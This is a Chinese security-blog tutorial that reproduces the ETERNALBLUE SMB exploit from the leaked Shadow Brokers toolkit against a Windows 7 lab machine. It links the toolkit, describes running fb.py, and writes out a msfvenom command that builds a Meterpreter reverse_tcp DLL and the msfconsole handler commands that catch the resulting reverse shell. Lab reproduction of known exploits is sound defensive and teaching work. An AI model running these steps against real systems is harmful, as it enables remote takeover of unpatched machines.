当前位置:首页 > 技术文章 > 安全攻防 > 网络安全

方程式0day ETERNALBLUE 复现过程

发布时间:2017-12-07 14:56:05 作者:inn0team 来源:微信公众号 点击量:

版权声明:本文首发于微信号:inn0team.此文章版权归属于 inn0team 所有.转载请务必保留此声明,违者必究。

系统环境

攻击机 192.168.108.129

win7 32bit 旗舰版

python-2.6.6.msi

https://www.python.org/download/releases/2.6.6/

pywin32-221.win32-py2.6.exe

https://sourceforge.net/projects/pywin32/files/pywin32/Build%20221/

1.jpg

 

攻击机2 192.168.108.131    Kali 2

2.jpg

靶机 192.168.108.132

win7 64bit 旗舰版

关闭系统防火墙

3.jpg

https://github.com/misterch0c/shadowbroker

下载解压 切换到windows目录执行fb.py

4.jpg

看fb.py发现是遍历目录的时候出错了,发现缺少listeningposts目录 创建一个listeningposts目录

 

再次运行fb.py创建一个攻击项目

5.jpg

这里要选择SMB和 对应的目标操作系统位数 下面的话是攻击的4个操作 选择RunDLL

这里用攻击机2 kali的msfvenom 生成一下dll 这里使用的是reverse_tcp的paylaod 可以根据网络情况采用其他payload

$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.108.131 LPORT=5555 -f dll > s.dll

11.jpg

把生成的s.dll传到攻击机1上去开启msfconsole 下面的payload要和上面msfvenom的payload对应起来

$ msfconsole
msf > use exploit/multi/handler
msf > set LHOST 192.168.108.131
msf > set LPORT 5555
msf > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf > exploit

 

12.jpg

接着切到攻击机1操作fb.py

13.jpg

14.jpg

15.jpg

 

本文链接:http://www.topjishu.net/article/41.html,如有转载,请注明出处!


关键词:方程式0day,ETERNALBLUE


发表评论 共有条评论
用户名: 密码:
验证码: 匿名发表